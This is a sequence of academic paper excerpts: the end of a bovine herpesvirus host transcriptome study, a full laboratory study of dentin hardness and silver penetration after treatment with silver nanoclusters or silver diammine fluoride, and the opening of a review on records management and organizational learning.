targeting to membrane" pathways. Many of these genes are also members of the "nuclear-transcribed mRNA catabolic process, nonsense-mediated decay" pathway.
Genes in the fourth cluster (n=64) had low relative expression preceding the infection. These genes were upregulated following a sigmoid curve during the infection. Genes in the fourth cluster were not significantly over-represented in any of the GO molecular functions or GO biological processes. The fifth cluster of genes (n=88) had zero or negligible expression preceding infection but showed an exponential increase in expression during the course of infection. The over-represented genes of this cluster were associated with antiviral cellular and defense responses such as the type I interferon signaling pathways. The sixth cluster of genes (n=335) consisted of a huge variety of host genes with high expression preceding viral infection that showed sharp downregulation during the infection. These genes were over-represented in pathways associated with protein folding, cell cycle regulation and mitochondrial processes including aerobic respiration.
Key response host genes
We performed DE analysis (with FDR=0.01) on the mock and 1-hour expression values to describe the immediate response of host cells. We identified 6 bovine genes that were significantly downregulated and 19 genes that were significantly upregulated in the three biological replicates (Supplementary Table S1). Over-representation analysis revealed no significant association with any of the GO biological processes or GO molecular functions using either the subset of up- and downregulated genes or the whole set of genes. However, STRING association analysis revealed 4 networks between these genes. The first gene network (GADD45B, GADD45A, DDIT3, ATF3, IFRD1, CARM1, SQSTM1) contains genes that are associated with the host DNA damage response and transcription regulation. Furthermore, one gene plays a role in selective autophagy. The second network consists of two interferon gamma stimulated genes: IRF9, a transcription factor that plays an essential role in antiviral activity, and MT2A, a metallothionein protein.
The third network consists of two genes (SRSF5 and HNRNPDL) associated with pre-mRNA processing, transport and splicing regulation. The cytokine IL11, which regulates hematopoietic cells, was part of the fourth network. We found IL11 to be downregulated. In contrast, CXCL5, a gene associated with neutrophil activation and also present in network 4, was upregulated following virus infection. The remaining four (LASP1, HDAC7, SLC44A2, HSPG2) out of 6 downregulated genes and eight (ID2, HMGN3, TMEM190, TSC22D1, PRKAR2B, LOC100847759, LOC100847143, LOC100174924) out of 19 upregulated genes include signaling, transcriptional regulator, and developmental genes.
Discussion
High-throughput long-read sequencing approaches are able to read full-length transcripts, and therefore allow a more comprehensive annotation of RNA molecules. LRS-based studies led to the discovery that the transcriptomes are much more complex than previously thought.
In this study, we annotated a large number of bovine transcripts and analyzed the effect of viral infection upon host gene expression. We found no significant change in the usage of promoters or PASs of the host genes. However, we observed an altered usage of transcript length and splice isoforms of the host RNA molecules. This indicates a modulation of cellular mRNA turnover. The analysis of TSS isoforms suggests that viral infection may have an effect on host mRNA translation, potentially through uORFs (Kronstad et al., 2013), or through other cis-acting elements, such as miRNA binding sites of 5'-UTRs. However, downstream TSSs can also result in truncated in-frame ORFs, which might code for N-terminally truncated polypeptides (Crofts et al., 1998;Tombácz et al., 2019). Unlike in HSV-1-infected cells (Rutkowski et al., 2015), we found no increase in the extent of transcriptional readthroughs in BoHV-1-infected cells.
Based on the alteration of expression kinetics, we detected six distinct gene clusters that had significantly changed expression during the course of virus infection. Based on the over-representation analysis of these clusters, we distinguished three functional groups. Genes involved in basic cell functions, including morphogenesis, cell cycle regulation, signaling, catabolic pathways and aerobic respiration, are generally downregulated during viral infection. On the other hand, we observed a considerable upregulation of genes involved in antiviral response. Additionally, genes playing a role in transcription, RNA decay, translation and protein folding were also upregulated. Our analysis shows that most of these genes are associated with distinct molecular functions and biological processes, indicating a general response to virus infection. However, the rest of the unassociated genes could also be associated with either susceptibility to or defense against viral infection. We also identified a small set of immediate response genes that exhibited significantly altered expression 1 hour after viral infection.
Altogether, our data provides valuable resources for future functional studies and for understanding how the virus can overcome host defense mechanisms. Furthermore, these results may be helpful for the development of novel antiviral therapies.
Declarations
Funding
This study was supported by OTKA K 128247 granted to ZB, by the OTKA FK 128252 and by the Lendület (Momentum) I Program of the Hungarian Academy of Sciences (LP-2020/8) granted to DT. The funding body had no role in study design, data collection and interpretation, or the decision to submit the work for publication.
Data availability statement
The sequencing datasets generated during this study are available at the European Nucleotide Archive's SRA database under the accession PRJEB33511 (https://www.ebi.ac.uk/ena/browser/view/PRJEB33511).
Conflict of interest
The authors declare no conflict of interest. | 2021-08-25T17:18:43.580Z | 2021-02-22T00:00:00.000 | {
"year": 2021,
"sha1": "99d468384554b7ac27de27c0f46762f7085df428",
"oa_license": "CCBY",
"oa_url": "https://www.researchsquare.com/article/rs-264666/latest.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "14009f20672def1edd246b04902d56f2caea4f7a",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": []
} |
265512696 | pes2o/s2orc | v3-fos-license | Application of 20% silver nanoclusters in polymethacrylic acid on simulated dentin caries; its penetration depth and effect on surface hardness
The aims of this study were: To evaluate the surface hardness of simulated dentin caries lesions treated with either silver nanoclusters (AgNCls) synthesized in polymethacrylic acid (PMAA) or 38% silver diammine fluoride (SDF), as well as observe the penetration of the treatment solutions into the simulated caries lesions. Dentin blocks 4 mm thick obtained from caries-free third molars were sectioned and then simulated caries lesions on the occlusal dentin surfaces were created. Each specimen (n = 8) was divided into four sections: (A) treated with 20% AgNCls/PMAA; (B) treated with SDF 38% (FAgamin, Tedequim, Cordoba, Argentina); (C) sound tooth protected by nail-varnish during artificial caries generation (positive control); and (D) artificial caries lesion without surface treatment (negative control). AgNCls/PMAA or SDF were applied on the simulated lesions with a microbrush for 10 s, then excess removed. The surface hardness was measured by means of Vickers indentation test. To trace the depth of penetration, up to 400 μm, of silver ions, elemental composition of the samples was observed using EDX, coupled with SEM, and measured every 50 μm from the surface towards the pulp chamber. Laser Induced Breakdown Spectroscopy (LIBS) was also employed to trace silver ion penetration; the atomic silver line 328.06 nm was used with a 60 μm laser spot size to a depth of 240 μm. Student’s-t test identified significant differences between treatment groups for each depth and the Bonferroni test was used for statistical analysis of all groups (p < 0.05). Mean surface hardness values obtained were 111.2 MPa, 72.3 MPa, 103.3 MPa and 50.5 MPa for groups A, B, C and D respectively. There was a significant difference between groups A and C compared with groups B and D, the group treated with AgNCls/PMAA achieved the highest surface hardness, similar or higher than the sound dentin control. A constant presence of silver was observed throughout the depth of the sample for group A, while group B showed a peak concentration of silver at the surface with a significant drop beyond 50 μm. The 20% AgNCls/PMAA solution applied to simulated dentin caries lesions achieved the recovery of surface hardness equivalent to sound dentin with the penetration of silver ions throughout the depth of the lesion.
The increasing trend for preserving the structure of caries lesions using agents such as Silver Diammine Fluoride as part of the initial treatment has promoted the resurgence of non-surgical strategies for the recovery of enamel and dentin affected by the demineralization process. The most commonly used concentration of SDF is 38% (44,800 ppm F), with a reported clinical efficacy in arresting the progression of dentinal caries of around 65.9% 1 . SDF in topical solutions has been shown to form silver phosphate that, when applied to carious lesions, rapidly turns black under the influence of reducing agents such as sunlight. The oxidation that occurs within the dental structures, which is the cause of the dark staining, is a controversial feature of SDF 2 . The discoloration effect on carious teeth is the most distinct deficiency of SDF and may therefore limit its clinical use in patients demanding more esthetic treatment outcomes.
Efforts have been made to counteract the staining effect of SDF by applying potassium iodide (KI) in a second step to prevent staining through the precipitation of excess silver ions as white silver iodide crystals 3,4 . Although most of the reports show that KI application after SDF treatment significantly reduced tooth staining for a short time, others suggest masking the SDF-treated surface with a tooth-colored restorative material, namely resin-modified or high-viscosity glass ionomer cement, or a resin composite, with variable success, as a darkened marginal stain typically remains if no tooth preparation occurs 3,5 . Potassium fluoride (KF) and silver nitrate (AgNO 3 ) have also been proposed to mitigate SDF-mediated staining, as well as polyethylene glycol (PEG)-coated nanoparticles containing sodium fluoride (NaF), and nanosilver fluoride (NSF) 5 .
The dentin architecture is disrupted when a caries lesion develops through the process of demineralization. Remineralization in dentin may take place when minerals interact with the undamaged organic matrix of the dentin. However, remineralization becomes more difficult when the matrix is more abundant. More than 90% of the organic component in dentin is Type I collagen, which provides the structural framework for apatite deposition and facilitates the enhancement of the mechanical properties of dentin 6,7 . Dentin collagen mineralization can be extrafibrillar and intrafibrillar. The former occurs in the intervals between collagen fibrils, while the latter occurs in the gaps, with the depositing minerals extending into the fibrils. In nature, only intrafibrillar mineralization in collagen fibrils may reproduce the original hierarchy of the mineral structure as in sound dentin, resulting in its optimized physical properties.
According to Minimally Invasive Dentistry principles, since the outer layer (the old term of infected dentin) is irreversibly denatured and cannot be remineralized, it should be removed; however, the inner layer (caries-affected dentin) can be remineralized 8 . Moreover, the remineralization of demineralized dentin is critical for improving bonding stability and preventing primary and recurrent caries lesions. On the other hand, laboratory research has indicated that only mineralized collagen fibrils can stop the degradation caused by MMPs and aging, and can thus restore the hardness of natural mineralized dentin, remove the action of these enzymes, and maintain the stability of the resin-dentin interface 9 . Functional mineralization by means of polymer-induced liquid precursors (PILP) 10 has been proposed to achieve intrafibrillar remineralization, whereas the mechanism of SDF in arresting dental caries seems to be supported by extrafibrillar mineralization combined with the inhibition of the growth of cariogenic pathogens.
To avoid staining of the recovered structures, a prototype infiltrating/remineralizing solution was developed using silver nanostructures that do not undergo this oxidation. Preliminary studies showed that silver nanoclusters synthesized in polymethacrylic acid (AgNCls/PMAA) did not generate color changes in artificial caries lesions in dentin, compared to a solution of 38% silver diammine fluoride. Furthermore, the application of this solution significantly increased the adhesion of a glass ionomer restorative cement 11 . As mentioned, the vehicle of the silver nanoclusters is a polymeric acid, similar to those applied with the PILP prototypes to achieve functional (intrafibrillar) mineralization. Therefore, it was hypothesized that, in addition to the improvements in optical and adhesive properties, this solution of 20% AgNCls/PMAA may increase the surface hardness of artificial caries lesions as well as evenly penetrate throughout the depth of the lesion.
In order to extend the assessment of other properties to characterize the development of this solution as a potential non-restorative treatment option for caries lesions, the effect of its topical application on a demineralized dentin surface, as well as its penetration into the demineralized dentin, were investigated. The aims of this study were: (a) to compare the surface hardness of artificial caries lesions in dentin treated with either 20% AgNCls/PMAA or 38% SDF, and (b) to evaluate the depth of penetration of silver ions into the demineralized dentin using either treatment option.
Materials and methods
All experimental protocols were approved by the Secretary of Research and Development, Universidad Católica de Cordoba, Argentina (SI-UCC research grants) and by the National Agency for Research under the research grant FONCYT-PICT2020 Serie A #00539, and PICT2019 N 241, CONICET-PIP, PRIMAR2017 (SECyT/UNC). All methods were carried out in accordance with relevant guidelines and regulations.
Preparation of samples
Two batches of eight non-carious third molars were obtained from the Bank of Human Teeth, Faculty of Dentistry, Universidad Nacional de Cordoba, Argentina (Ord.3/16HCD and Res.333/17 HCD); one batch was used for the microhardness test, whereas the second batch was used for tracing silver ions, first by LIBS and then by EDX analysis.
Dentin blocks, 4 mm thick, were obtained by removing the occlusal enamel using a water-cooled low-speed cutting machine (Buehler, Germany) perpendicular to the long axis of the tooth to obtain flat mid-coronal dentin surfaces. These were sequentially polished with 400- to 1200-grit silicon carbide papers, followed by coating with nail varnish (Revlon, New York, USA) to leave an exposed window of 5 × 5 mm on the occlusal dentin surface for the production of demineralized dentin to simulate dental caries, while preserving the sound dentin surfaces covered by the nail varnish for later comparison.
Samples were immersed for 66 h in a solution containing 0.05 M acetate buffer and 2.2 mM calcium phosphate adjusted to pH 5.0 to generate a demineralized layer approximately 150-200 μm deep to simulate a carious lesion 12 .
Once the artificial lesions were produced, four slices 1.5 mm thick from each specimen were cut from the occlusal to the apical region and carefully secured in a positioner shelf to receive either treatment, as displayed in Fig. 1. Specimens were divided into the following groups:
1. Treated with 20% AgNCls/PMAA 11 ; the solution was applied to the exposed demineralized surface with a microbrush for 10 s, then incubated at 37 °C and 100% relative humidity for 24 h;
2. Treated with SDF 38% (FAgamin, Tedequim, Cordoba, Argentina); the solution was applied on the exposed demineralized surface with a microbrush for 10 s, left to rest for 180 s and the excess was removed with a cotton pellet 13 , then incubated at 37 °C and 100% relative humidity for 24 h;
3. Sound tooth structure protected by nail varnish during artificial caries generation and incubated for 24 h at 37 °C and 100% relative humidity (positive control); and,
4. Control (no treatment); exposed demineralized surfaces were left untreated, then incubated for 24 h at 37 °C and 100% relative humidity (negative control).
Surface hardness
The hardness test was performed at room temperature by the Vickers indentation test, using a hardness tester (Microhardness Tester FM-300; Future-Tech Corp, Fujisaki, Kanagawa, Japan) consisting of a pyramidal diamond indenter.
Vickers hardness (HV) values were determined by performing 5 indentations in different locations on each specimen with a load of 100 g for 10 s on the polished surface.
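For reference, the Vickers number is obtained from the indentation load and the mean indent diagonal as HV = 1.8544·F/d² (F in kgf, d in mm, giving kgf/mm²), and multiplying by 9.80665 expresses it in MPa. A small sketch with illustrative indent sizes (the diagonal lengths below are hypothetical, not measured values):

```python
def vickers_hardness_mpa(load_g, diag1_um, diag2_um):
    """Vickers hardness from the two indent diagonals.
    HV (kgf/mm^2) = 1.8544 * F / d^2, with F in kgf and d the mean
    diagonal in mm; multiplied by 9.80665 to express the result in MPa."""
    f_kgf = load_g / 1000.0
    d_mm = (diag1_um + diag2_um) / 2.0 / 1000.0
    hv = 1.8544 * f_kgf / d_mm**2
    return hv * 9.80665

# Example: a 100 g load leaving ~128 um diagonals gives roughly 111 MPa,
# on the order of the sound-dentin values reported in Table 1.
print(f"{vickers_hardness_mpa(100, 128, 128):.1f} MPa")
```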
Depth of penetration of silver ions
Laser Induced Breakdown Spectroscopy. A diagram of the Laser Induced Breakdown Spectroscopy (LIBS) system is shown in Fig. 2. A Q-switched Nd:YAG laser (Surelite I, Continuum), operating at its third harmonic wavelength (355 nm), was used to initiate the ablation. The laser beam was directed to the sample using dichroic mirrors and was focused using a 5 cm focal length achromatic lens. The sample was positioned at the focal plane of the lens in order to create craters close to the optical diffraction limit. An XYZ motorized stage was used for positioning the sample. Images of the sample were acquired by an instrument-coupled webcam. A UV-Vis fiber [...] A spot size of 60 μm was used, and 8 sampling spots separated 30 μm apart from each other were studied to achieve a penetration depth of 240 μm. A silver atomic line at 328.06 nm was selected since spectral interference was not observed and it is one of the most intense emission lines for silver.
SEM/EDX. SEM analyses were subsequently performed as an alternative procedure to measure the depth of penetration of silver ions using the same specimens. Images were acquired using a Philips SEM (XL30, Netherlands). The elemental composition of the samples was observed using EDX, coupled with SEM. Specimens were sputter-coated with gold (Q150R ES, Quorum Technologies, East Sussex, UK) with an operating current of 23 mA. The specimen surface was then examined using a scanning electron microscope (SEM, JSM 7800F, JEOL Ltd., Tokyo, Japan) with an accelerating voltage of 5 kV and a magnification ranging from 2500× to 20,000×.
Elemental analysis was performed using an energy-dispersive X-ray spectrometer (EDX, X-Max 20, Oxford Instruments, Abingdon, UK) to determine the elemental composition (Ca, P, Ag, or F) of the precipitate on representative specimens. Chemical element mapping was performed with EDX by tracing the silver signal. Three random lines, running from the outer surface of the lesion to a depth of 400 μm, served to quantify the presence of silver at 50 μm intervals at a magnification of 20,000× and a beam voltage of 5 kV. An average elemental value, expressed as %weight/volume of silver, was recorded for each depth. Quantitative analysis of silver was thus performed at 50 μm increments up to 400 μm from the surface (8 sub-segments).
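A minimal Python sketch of the depth-binning step follows; the data layout is hypothetical (this is not the authors' software). The silver readings from the three measurement lines are averaged within each 50 μm sub-segment.

import statistics

def mean_ag_per_depth(lines: list[list[float]]) -> list[tuple[str, float, float]]:
    """lines: three lists of eight Ag readings (%weight/volume), one reading
    per 50 um sub-segment from 0-50 up to 350-400 um.
    Returns (depth label, mean, standard deviation) per sub-segment."""
    profile = []
    for i in range(8):
        vals = [line[i] for line in lines]  # same sub-segment, all three lines
        profile.append((f"{50 * i}-{50 * (i + 1)} um",
                        statistics.mean(vals), statistics.stdev(vals)))
    return profile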
Statistical analysis
For the microhardness test, the average of the five measurements obtained for each specimen was recorded in an Excel file. Statistical analysis was performed using ANOVA, with significance set at the 95% confidence level (p < 0.05). Statistical differences between groups in surface hardness were determined using the Bonferroni test (p < 0.05). To determine differences between the two treatment options at each depth, Student's t-test was used with significance set at p < 0.05, whereas significant concentration differences across the depths of penetration were determined by means of the Student-Newman-Keuls (SNK) test at α = 0.05.
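For readers wishing to reproduce this pipeline, the following scipy-based Python sketch is one possible stand-in (the paper does not name a statistics package beyond Excel): a one-way ANOVA across the four groups followed by Bonferroni-corrected pairwise t-tests. The per-depth Student's t-tests can reuse the same ttest_ind call on the two treatment groups at each depth.

from itertools import combinations
from scipy import stats

def hardness_stats(groups: dict[str, list[float]], alpha: float = 0.05) -> None:
    """One-way ANOVA across groups, then Bonferroni-adjusted pairwise t-tests."""
    f, p = stats.f_oneway(*groups.values())
    print(f"ANOVA: F = {f:.2f}, p = {p:.4f}")
    pairs = list(combinations(groups, 2))
    for a, b in pairs:
        t, p_raw = stats.ttest_ind(groups[a], groups[b])
        p_adj = min(1.0, p_raw * len(pairs))  # Bonferroni correction
        flag = "  *" if p_adj < alpha else ""
        print(f"{a} vs {b}: t = {t:.2f}, adjusted p = {p_adj:.4f}{flag}")

# Example call with hypothetical per-specimen hardness means (MPa):
# hardness_stats({"A": [...], "B": [...], "C": [...], "D": [...]})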
Statement of ethics
All experimental protocols were approved by the Secretary of Research and Development, Universidad Católica de Córdoba, Argentina (SI-UCC research grants) and by the National Agency for Research under research grants FONCYT-PICT2020 Serie A #00539, PICT2019 N 241, CONICET-PIP, and PRIMAR2017 (SeCyT/UNC). All methods were carried out in accordance with relevant guidelines and regulations.
Informed consent was obtained from all subjects and/or their legal guardian(s) who donated their teeth to the Bank of Human Teeth, Faculty of Dentistry, Universidad Nacional de Cordoba, Argentina (Ord.3/16HCD and Res.333/17 HCD).
Results
Surface hardness
Table 1 shows the mean surface hardness values obtained for experimental groups A, B, C, and D: 111.2 MPa, 72.3 MPa, 103.3 MPa, and 50.5 MPa, respectively. The results showed significant differences between groups A (treated with AgNCls/PMAA) and C (sound dentin) relative to groups B (treated with SDF) and D (demineralized dentin) (p = 0.01). The group treated with the 20% AgNCls/PMAA solution achieved the highest microhardness value, similar to or higher than that of sound dentin.
Depth of penetration of silver ions
EDX was used to verify the presence of elemental silver in the SEM images of groups C and D. The EDX analyses confirmed the lack of detectable silver in non-demineralized samples as well as in untreated control lesions. For groups A and B, silver penetration, quantified as weight %, was verified from 0 to 400 µm.
As shown in Table 2 and Fig. 3, there was a greater presence of silver at the surface (0-50 µm) for the group treated with 38% SDF, while the group treated with 20% AgNCl/PMAA maintained significant and constant amounts of silver throughout the entire lesion depth, from 0 to 400 µm.
The analysis by LIBS was carried out on 8 points from one specimen from each treatment group, namely one specimen treated with 38% SDF and one treated with 20% AgNCl/PMAA. For each sample, 8 single-pulse craters were made, and the emission intensity of the 328.06 nm silver line was recorded. The variation of the intensity of the silver atomic line with depth is presented in Table 3 and Fig. 4.
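A Python sketch of how such a per-crater depth profile could be assembled follows. The data layout is an assumption: the paper records the 328.06 nm line with a monochromator and photomultiplier, so each pulse is represented here simply by a background-corrected line intensity, and pulse n is assigned a depth of n × 30 μm (8 pulses reaching 240 μm, as described in the Methods).

ABLATION_PER_PULSE_UM = 30.0  # each single pulse removes roughly 30 um

def depth_profile(line_intensities: list[float]) -> list[tuple[float, float]]:
    """Pair each pulse's background-corrected 328.06 nm Ag intensity with the
    depth it sampled: pulse n probes n * 30 um (n = 1..8 -> 30..240 um)."""
    return [((i + 1) * ABLATION_PER_PULSE_UM, ag)
            for i, ag in enumerate(line_intensities)]

# Example with hypothetical intensities showing a fast surface decay:
sdf_like = [9.5, 4.1, 2.2, 1.4, 1.1, 0.9, 0.8, 0.8]
for depth, ag in depth_profile(sdf_like):
    print(f"{depth:5.0f} um  Ag I(328.06 nm) = {ag}")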
The intensity of the atomic line revealed a greater concentration of silver at the surface for each group. The group treated with 38% SDF initially showed higher intensity values than the samples from the 20% AgNCl/PMAA group, consistent with the higher silver concentration of the SDF solution relative to the AgNCl/PMAA solution. The depth profiles show that, as depth increased, the silver concentration of the samples treated with 38% SDF decreased more rapidly than that of the samples treated with 20% AgNCl/PMAA. The silver concentration of the group treated with 20% AgNCl/PMAA remained almost constant, and from 150 µm onwards the concentrations for the two treatment groups were not statistically different (p > 0.05).
Discussion/conclusion
It is suggested that, to recover the functional and physical properties of dentin that can be remineralized, the remineralizing agent must reach the base of the lesion and deliver, from the bottom up, the chemical compounds that will provide structural form and strength to the collagen network. Measuring the depth of penetration, however, is challenging, even in laboratory models. Studies based on transverse microradiography alone provide information only on mineral density and do not provide ultrastructural evidence of the intrafibrillar remineralization that is critical for restoring the mechanical properties of the remineralized dentin matrix. Thus, to test its hypothesis, this study used a combination of mineral density assessment, by means of a scanning electron microscope (SEM) coupled with an energy-dispersive X-ray spectrometer, and evaluation of the mechanical properties of the remineralized dentin, by testing the microhardness of the surface exposed to the two remineralizing solutions.
The results obtained in the present study are similar to other published data, in which the Vickers hardness of natural dentin (ND) was 75.1 ± 3.2 MPa, decreasing to 55.2 ± 2.9 MPa after demineralization of the dentin (DD) 8 . In that study, when these surfaces were treated with a biomimetic mineralizing solution, the demineralized dentin was remineralized, reaching hardness values of 68.5 ± 2.5 MPa in the biomimetic mineralized dentin (BMD) group. The BMD group also showed higher hardness values than the DD, the ND, and conventionally mineralized dentin.
In the present study, the highest values for surface hardness were observed in the AgNCls/PMAA group, which contains no fluoride in its composition. It is hypothesized that the PMAA could have modified the disposition of the collagen fibers, consolidating a tight and dense network with improved mechanical properties. In evaluating this hypothesis, one must also consider the limitations of the artificial caries model that has been universally employed for the evaluation of dentin remineralization. Unlike artificial carious lesions, naturally occurring caries-affected dentin produced by bacterial acid challenge in the oral cavity is highly heterogeneous, and its dentinal tubules are occluded by minerals that restrict diffusion of large molecular species into the intertubular collagen matrix 14,15 .
Remineralization of demineralized dentin is attributed to the high concentration of fluoride in SDF, whereas silver is responsible for the antibacterial effect. Silver ion penetration studies showed that silver is distributed throughout the affected area, even penetrating into parts of the healthy dentin; this had already been demonstrated in previous work using SDF via an EDX technique 16 . The results of the current study show that both compounds penetrated the demineralized tissues, but 38% SDF showed a less homogeneous distribution of silver ions than the samples treated with 20% AgNCl/PMAA. Silver is known to inhibit bacterial growth by interacting with bacterial cell membranes and enzymes, and it is also able to dope hydroxyapatite; silver-doped hydroxyapatite increases the antibacterial effect and prolongs its presence over time 17 . As the samples treated with 20% AgNCl/PMAA showed a better and more homogeneous distribution of ions, it may be assumed that the antibacterial effect is likely to cover the affected area homogeneously.
The LIBS technique has previously been used in dental research to determine the presence or absence of carious or demineralized areas 18,19 and to study the presence and distribution of elements in teeth 20,21 . In this study, LIBS proved useful for determining the silver signal at different penetration depths in the treated samples, and these results correspond with those obtained from the EDX analyses. The differences observed between the two techniques may be attributed to the fact that EDX determines %weight per volume while LIBS measures relative molar concentrations per volume. In addition, EDX analysis is more superficial than LIBS analysis, which means that in the latter case there is also a component of lateral diffusion of the SDF or AgNCl/PMAA. However, in contrast to EDX, LIBS is a relatively simple and inexpensive technique that can be set up in almost any research laboratory.
Regular strategies for remineralization have been based upon the use of fluoride compounds to produce hypermineralization of the lesion surface. Top-down remineralization strategies invariably require the presence of non-collagenous proteins, such as phosphophoryn and dentin matrix protein, that are present during the formation of dentin. Partial demineralization of mineralized collagen fibrils by bacterial acids represents a top-down approach to generating apatite seed crystallites, which differs from intrafibrillar mineralization using polymer-induced precursors. Expressed in conventional crystallization terminology, current remineralization strategies lack mechanisms for inducing apatite nucleation and the hierarchical assembly of apatites within a collagen matrix 22 .
Guided tissue remineralization (GTR) represents a promising strategy in collagen biomineralization. This mineralization strategy, which is particle-mediated and progresses from the bottom up, differs from what has traditionally been used in dentistry for conventional remineralization. It utilizes nanotechnology and biomimetic principles to achieve intra- and extrafibrillar remineralization of a collagen matrix in the absence of apatite seed crystallites 14 . This may explain why the amount of silver decreased at a depth of 100-150 μm and increased again at 150-200 μm, instead of decreasing continuously, as shown in Fig. 3. As this increase can also be observed in the penetration of silver from the SDF, it may be hypothesized that these artificial lesions presented a more affected area at a depth of 150-200 μm, where silver particles were more easily accommodated.
In the attempt to achieve functional mineralization, polyanionic analogs are employed to mimic the functions of dentin matrix proteins in biomineralization. For that purpose, a polycarboxylic acid-based biomimetic analog is usually employed as a sequestration agent to stabilize amorphous calcium phosphate. In the present study, polymethacrylic acid functions as the polymer liquid precursor, and the AgNCls play the role of calcium and phosphate ions, reproducing this particle-based assembly approach in the absence of apatite seed crystallites in the collagen matrix.
This biomimetic remineralization process represents a bottom-up approach to create nanocrystals that are small enough to fit into the gap zones between adjacent collagen molecules and to establish a hierarchical order within the mineralized collagen. Determining whether this type of remineralization occurs with this prototype solution will require more accurate techniques and resources, an effort encouraged by the results obtained in this preliminary study.
Therefore, considering the above-mentioned limitations, it is possible to conclude that a 20% AgNCls/PMAA solution applied to artificial caries lesions was able to restore the hardness of demineralized dentin to that of undemineralized dentin and was able to penetrate to the full depth of the demineralized lesion.
Figure 1. Preparation of the samples.
Figure 4. Intensity (328.06 nm silver atomic line) vs penetration depth of the treated dentin measured with LIBS.
Table 1. Surface hardness mean values and standard deviations of the four groups. Values expressed in megapascals (MPa); different letters express statistical differences (p < 0.05).
Table 2. Mean (and standard deviation) %weight per volume values of silver traced at different penetration depths for the AgNCls/PMAA and SDF groups. Values expressed in %weight per volume. Different letters express significant differences between groups. For each depth of penetration, significant differences between the AgNCls/PMAA and SDF groups were determined by means of Student's t-test, with the p-value indicated in the respective row (*p < 0.05).
Figure 3. Penetration of silver ions into different depths of the treated dentin measured with EDX.
Table 3. Mean (and standard deviation) intensity of the 328.06 nm silver atomic line traced at different penetration depths for the AgNCls/PMAA and SDF groups. No statistical differences (p < 0.05) were detected among these groups. | 2023-12-02T06:17:23.403Z | 2023-11-30T00:00:00.000 | {
"year": 2023,
"sha1": "643439d2721797235dbf0d09d808ba8317598307",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "25bb2b63c4b3ed179e61229b5d353e816cffac21",
"s2fieldsofstudy": [
"Medicine",
"Materials Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
110097892 | pes2o/s2orc | v3-fos-license | Records management : a basis for organizational learning and innovation Gestão de documentos : bases para a aprendizagem e inovação organizacional
The understanding of (trans)formations related to organizational learning processes and knowledge recording can promote innovation. The objective of this study was to review the conceptual contributions of several studies regarding Organizational Learning and Records Management and to highlight the importance of knowledge records as an advanced management technique for the development and attainment of innovation. To accomplish this goal, an exploratory and multidisciplinary literature review was conducted. The results indicated that the identification and application of management models to represent knowledge is a challenge for organizations aiming to promote conditions for the creation and use of knowledge in order to transform it into organizational innovation. Organizations can create spaces and environments for local, regional, national, and global exchange with the strategic goal of generating and sharing knowledge, provided they know how to utilize Records Management mechanisms.
Introduction
Present-day society faces the challenge of accepting an extraordinarily broad diversity of cultural and ethnic groups and individuals. From this perspective, mechanistic or deterministic views are not the only ones that should be considered in the attempt to understand social phenomena (Morin, 2005a, 2005b; Bourdieu, 2009). Organizations are not excluded from such views, and a strong information flow continually impacts them, affecting their actions in space and time (Rousseau; Couture, 1998).
The way for organizations to differentiate themselves is related to their ability to access information and, above all, to learn, assimilate, and address innovation. This implies the adoption and assimilation of Records Management among individuals and organizations as an initial Knowledge Management process that makes Organizational Learning feasible and thereby promotes innovation.
Therefore, it is advisable to understand recent (trans)formations and innovations with regard to the processes of Organizational Learning linked to knowledge records. These parameters can be contextualized as social, technical, and cognitive phenomena and depend on a form of Records Management that enables Knowledge Management to promote Organizational Learning.
However, the relationship between Organizational Learning and Records Management must first be defined. The objective of this study was to review conceptual contributions from several studies regarding Organizational Learning and Records Management, as well as to highlight the importance of knowledge representation processes as an advanced management technique for promoting innovation. Rousseau and Couture (1998, p.55, our translation) emphasized that "Organizations change attitude when challenged with information and move towards recognizing informational resources"4 . Records Management is therefore intrinsic to Knowledge Management, and performing it effectively contributes directly to Organizational Learning and to the innovative capacity of organizations.
The methodological approach is multidisciplinary (involving Information Science, Archivology, Sociology, Administration, and Economics) because it involves a conceptual framework related to the phenomenon of Organizational Learning linked to knowledge records. Given the complexity of the subject, a multiple-reference approach can be adopted, in which researchers provide a conceptual synthesis of the subject under investigation; more importantly, this approach is based on different viewpoints and reference systems that are not reducible to each other and that are made explicit by means of distinct approaches and terminologies (Fróes Burnham, 1998). Moreover, this approach can be used as part of a qualitative study for bibliographic and documental reviews, which fit the concept of basic research (Gil, 1994).
With the goal of achieving the stated objective, the present study provides a non-exhaustive review of Organizational Learning, Knowledge Management, and Records Management, and highlights the knowledge representation process as an open field for dialogue with Organizational Learning in the fields of Archivology and Information Science within the framework of these theoretical constructs.
Double-loop learning and systems thinking
Organizational Learning is understood as an ongoing process that arises from the sum of the individual learning of an organization's members but that exceeds this sum. This process is characterized by interaction and collaboration between individuals and between working groups within social and technological systems, which work toward the development and change of organizational practices and consequently contribute to the promotion of organizational innovations (Vasconcelos; Mascarenhas, 2007; Takeuchi; Nonaka, 2008; Argyris, 2010; Senge, 2010).
According to the Organization for Economic Cooperation and Development (OECD) and the Financiadora de Estudos e Projetos (FINEP, Funding Agency for Studies and Projects), organizational innovations consist of the adoption and incorporation of significantly altered organizational structures, advanced management techniques, and new or substantially altered strategic orientations (Financiadora de Estudos e Projetos, 2005).
Argyris (2010) emphasized that Organizational Learning is associated with the capacity of the different parties that make up an organization to interact. This process relates to individuals when they seek to correct errors resulting from something that was carried out incorrectly. Therefore, Organizational Learning can be processed in two ways: by a single loop or a double loop.
Single-loop learning occurs when an error is corrected without questioning the organizational action strategies (i.e., the variables or the values implicit in the action). Thus, learning is reflected only in the improvement of operational processes, without altering the organization's guidelines. This type of learning causes individuals to transform the action that resulted in the error, but they still operate based on the assumptions and values that underlie the action strategy. Consequently, new behaviors are not adopted (Argyris, 2010).
